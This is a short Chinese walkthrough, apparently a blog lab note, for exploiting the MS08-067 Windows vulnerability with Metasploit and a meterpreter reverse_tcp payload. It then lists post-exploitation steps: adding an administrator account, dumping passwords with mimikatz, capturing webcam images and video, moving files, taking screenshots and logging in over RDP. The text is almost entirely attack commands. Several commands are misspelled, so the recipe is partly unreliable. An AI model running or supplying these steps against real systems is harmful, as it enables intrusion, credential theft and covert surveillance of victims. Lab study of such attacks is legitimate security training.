ms08-067漏洞
ms08-067漏洞攻击
实验过程
- 1.通过命令:
ipconfig、ifconfig确认攻击机和靶机在同一网段 - 2.通过ping命令确认靶机存活。
![如图]()
- 3.通过命令:
msfconsole启用msf。 - 4.攻击。
- 1.搜索漏洞,命令:
search ms08-067。 - 2.设置攻击机地址,命令:
set lhost ip地址 - 3.设置攻击机端口,命令:
set lport 端口号 - 4.设置靶机地址,命令:
set rhost ip地址 - 5.加载攻击载荷,命令:
set payload windows/meterpreter/reverse_tcp。 - 6.进行攻击:
exploit/run
- 1.搜索漏洞,命令:
- 5.获得靶机权限。
- 6.后渗透利用
- 1.查看权限 命令:
gituid - 2.进入shell
- 3.添加用户账号 命令:
net 用户名 密码 /add - 4.提权:
net localgroup administrators 用户名 /add - 5.远程登录 命令:
rdesktop IP - 6.查看无操作时间 命令:
idletime - 7.获取账户密码 命令:
meterpreter> load mimikatz
meterpreter> msv
meterpreter> wdigest - 8.查看网络摄像头列表 命令:
wencam_list - 9.拍照 命令:
wencam_snap - 10.抓取视频 命令:
wencam_stream - 11.下载文件 命令:
download path/filenam path - 12.上传文件 命令:
upload path/filename path/filename - 13.远程登录 命令:
rdesktop 靶机ip必须开启3389服务 - 14.截屏 :
# load espia
# screenshot
- 1.查看权限 命令:


浙公网安备 33010602011771号